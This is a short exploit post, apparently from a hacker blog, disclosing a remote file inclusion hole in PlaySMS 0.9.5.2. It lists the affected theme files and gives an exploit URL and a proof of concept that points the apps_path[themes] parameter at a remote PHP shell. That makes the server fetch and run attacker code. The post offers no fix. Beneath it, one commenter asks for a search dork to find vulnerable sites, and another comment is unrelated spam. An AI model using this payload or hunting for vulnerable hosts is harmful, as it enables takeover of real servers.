PlaySMS Remote File Inclusion Vulnerability

Comments

PlaySMS Remote File Inclusion Vulnerability

[o] PlaySMS <= Remote File Inclusion Vulnerability

Software : PlaySMS ver 0.9.5.2
Vendor : http://playsms.org/
Author : NoGe

[o] Vulnerability

affected all this files

web/plugin/themes/default/page_forgot.php
web/plugin/themes/default/page_login.php
web/plugin/themes/default/page_noaccess.php
web/plugin/themes/default/page_register.php
web/plugin/themes/km2/page_noaccess.php
web/plugin/themes/work2/page_forgot.php
web/plugin/themes/work2/page_login.php
web/plugin/themes/work2/page_noaccess.php
web/plugin/themes/work2/page_register.php

[o] Exploit

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=[RFI]

[o] PoC

http://localhost/[path]/web/plugin/themes/default/page_forgot.php?apps_path[themes]=http://phpshell?

Categories: vulnerabilities

3 Responses so far.

Anonymous says:

September 8, 2011 1:13 AM

hey noge
can u give me a google dork for this vlun,plz??
jogja says:

September 15, 2011 2:20 PM

thank you very helpful article
Brian says:

January 15, 2012 11:50 PM

We all need help sometimes and when I needed some methamphetamine addiction help, I knew there was help out there.

NoGe.ZoNe